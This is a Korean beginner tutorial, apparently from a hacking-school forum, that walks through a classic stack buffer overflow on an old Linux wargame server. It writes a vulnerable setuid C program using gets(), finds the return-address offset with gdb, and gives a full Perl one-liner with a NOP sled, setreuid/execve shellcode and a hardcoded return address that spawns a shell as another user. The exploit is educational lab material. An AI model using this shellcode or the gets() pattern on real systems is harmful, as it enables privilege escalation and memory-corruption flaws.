http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=181 [º¹»ç]
Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com
아래 문서에서 주석처리된 부분이 설명입니다.
초보자들이 쉽게 따라 할 수 있도록 한번 만들어 봤습니다.
제 워게임 서버에서 테스트 해봤습니다.
두가지 버젼으로 준비해 봤습니다.
직접 버퍼에 쉘코드를 집어넣고 하는 방법과 egg 프로그램을 이용하는 방법입니다.
gcc 버젼 정보입니다.
[root@localhost .test]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
[root@localhost /]# mkdir .test
[root@localhost /]# cd .test
//test 환경을 만들어 보겠습니다. 쓰지 말아야할 gets함수를 썼습니다.^^
[root@localhost .test]# cat > testApp.c
#include <stdio.h>
/*
 * Deliberately vulnerable teaching program.
 *
 * Reads one line from stdin into a fixed 200-byte stack buffer with gets(),
 * which has no length bound, and echoes it back.  The transcript that
 * follows feeds 300 bytes into this buffer and the process faults, and the
 * linker itself warns that gets() is dangerous.  The bounded replacement is
 * fgets(buffer, sizeof buffer, stdin); the defect is kept here only because
 * the lesson depends on it.  Note that the transcript also installs the
 * binary setuid (chmod 4750), so any overflow runs with the owner's uid.
 *
 * argc/argv are unused.  main is declared void; the compiler warns about
 * the non-int return type (see the build output below).
 */
void main(int argc , char** argv)
{
char buffer[200];   /* fixed-size stack buffer; no room for more than 199 chars + NUL */
printf("type ur words : ");
gets(buffer);       /* unbounded read: input longer than the buffer overwrites the stack */
printf("words = %s\n" , buffer);
}
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
합계 28
drwxr-xr-x 2 root root 4096 4월 10 00:08 .
drwxr-xr-x 21 root root 4096 4월 9 23:17 ..
-rwsr-x--- 1 recluse8 recluse7 13842 4월 10 00:08 testApp
-rw-r--r-- 1 root root 155 4월 10 00:08 testApp.c
[root@localhost .test]#
//프로그램을 펄을 가지고 실험해보았습니다.
[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp
type ur words : words = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
세그멘테이션 오류
[root@localhost .test]#
//세그멘테이션 오류가 나는걸 보니 bof가 일어납니다.
/*
*첫번째 방법입니다.
*일단 gdb로 disassemble 해서 우리가 넣을 버퍼의 주소와 ret address가 들어갈 부분을 알아보도록 하겠습니다.
*주변 지식은 ganseo.com의 문서를 참조하세요.
*앞으로 우리는 A로 채웠던 부분에 우리의 쉘코드를 넣을테고 main함수의 ret address부분에
*우리가 넣은 쉘코드의 주소를 넣어줄 예정입니다.^^
*/
[root@localhost .test]# gdb -q testApp
(gdb) disass main
Dump of assembler code for function main:
0x8048490 <main>: push %ebp
0x8048491 <main+1>: mov %esp,%ebp
0x8048493 <main+3>: sub $0xd8,%esp
//buf를 컴파일러가 dummy와 함께 이만큼 잡는다. 10진수로 216
//그러면 앞으로 찾아볼 ebp - 0xd8을 한곳에 입력받은 값이 들어갈 것이라 예상할수 있다.
0x8048499 <main+9>: sub $0xc,%esp
0x804849c <main+12>: push $0x8048548
0x80484a1 <main+17>: call 0x804836c <printf>
0x80484a6 <main+22>: add $0x10,%esp
0x80484a9 <main+25>: sub $0xc,%esp
0x80484ac <main+28>: lea 0xffffff28(%ebp),%eax
0x80484b2 <main+34>: push %eax
0x80484b3 <main+35>: call 0x804833c <gets>
0x80484b8 <main+40>: add $0x10,%esp
0x80484bb <main+43>: sub $0x8,%esp
0x80484be <main+46>: lea 0xffffff28(%ebp),%eax
0x80484c4 <main+52>: push %eax
0x80484c5 <main+53>: push $0x8048559
0x80484ca <main+58>: call 0x804836c <printf>
0x80484cf <main+63>: add $0x10,%esp
0x80484d2 <main+66>: leave
0x80484d3 <main+67>: ret
0x80484d4 <main+68>: nop
0x80484d5 <main+69>: nop
0x80484d6 <main+70>: nop
0x80484d7 <main+71>: nop
0x80484d8 <main+72>: nop
0x80484d9 <main+73>: nop
0x80484da <main+74>: nop
0x80484db <main+75>: nop
0x80484dc <main+76>: nop
0x80484dd <main+77>: nop
0x80484de <main+78>: nop
0x80484df <main+79>: nop
End of assembler dump.
(gdb)
//ebp를 찾아서 ret address가 어디있는지 추측해보자.
(gdb) b *(main+3)
0x08048493 in main ()
(gdb) info reg
eax 0x40158ac0 1075153600
ecx 0x0 0
edx 0x0 0
ebx 0x40159fd0 1075158992
esp 0xbffffab8 0xbffffab8
ebp 0xbffffab8 0xbffffab8 //여기가 ebp다. 그렇다면 ebp + 4 부분에 우리가 만들 쉘코드의 address를 넣어주면 되겠다.
esi 0x40015e4c 1073831500
edi 0xbffffb24 -1073743068
eip 0x8048493 0x8048493
eflags 0x396 918
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x23 35
fioff 0x400458fe 1074026750
foseg 0x2b 43
fooff 0x808fc74 134806644
fop 0x2e9 745
xmm0 0x00000000000000000000000000000000
xmm1 0x00000000000000000000000000000000
xmm2 0x00000000000000000000000000000000
xmm3 0x00000000000000000000000000000000
xmm4 0x00000000000000000000000000000000
xmm5 0x00000000000000000000000000000000
xmm6 0x00000000000000000000000000000000
xmm7 0x00000000000000000000000000000000
mxcsr 0x1f80 8064
(gdb)
(gdb) b *(main+58)
Breakpoint 1 at 0x80484ca
(gdb) r
Starting program: /.test/testApp
type ur words : AAAAAAAAAAAAAAA
Breakpoint 1, 0x080484ca in main ()
(gdb)
(gdb) x/100bx 0xbffff9e0
(gdb) x/100bx 0xbffff9d0
0xbffff9d0: 0x59 0x85 0x04 0x08 0xe0 0xf9 0xff 0xbf
0xbffff9d8: 0x74 0x61 0xdf 0x03 0xa0 0xfa 0xff 0xbf
0xbffff9e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 //추측한대로 ebp - 0xd8부분에 A(0x41)이 들어가있다.
0xbffff9e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x00
0xbffff9f0: 0xfc 0x1b 0x03 0x40 0xe0 0x63 0x01 0x40
0xbffff9f8: 0x01 0x00 0x00 0x00 0xa0 0x81 0x04 0x08
0xbffffa00: 0x94 0x60 0x01 0x40 0x8e 0xff 0x77 0x01
0xbffffa08: 0x8e 0xff 0x77 0x01 0xd0 0xfa 0xff 0xbf
0xbffffa10: 0xf8 0x5e 0x01 0x40 0x4c 0x82 0x04 0x08
0xbffffa18: 0x10 0x69 0x69 0x0d 0x5c 0xfa 0xff 0xbf
0xbffffa20: 0xec 0x46 0x03 0x40 0xe0 0x63 0x01 0x40
0xbffffa28: 0xc0 0x66 0x01 0x40 0x01 0x00 0x00 0x00
0xbffffa30: 0x00 0x00 0x00 0x00
(gdb)
//이제 우리가 넣을 쉘코드의 주소도 알아냈고 쉘코드 주소가 들어가야할 부분의 주소도 알아냈으니
//간단한 펄스크립트를 만들어보자. 쉘코드는 문서를 참조하시길...
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)
//쉘코드 byte 63
//main의 return address 까지의 byte 216 + 4 = 220
[root@localhost .test]# su recluse7
[recluse7@localhost .test]$ (perl -e 'print "\x90"x156';perl -e 'print "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x00"';perl -e 'print "\xe0\xf9\xff\xbf"';cat)|./testApp
type ur words : words = 1?¹ð1?»ð1À°FÍë^1ÀFF V
?N?ÛØ@Íè?ÿÿ/bin/sh
?
id
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)
성공했습니다.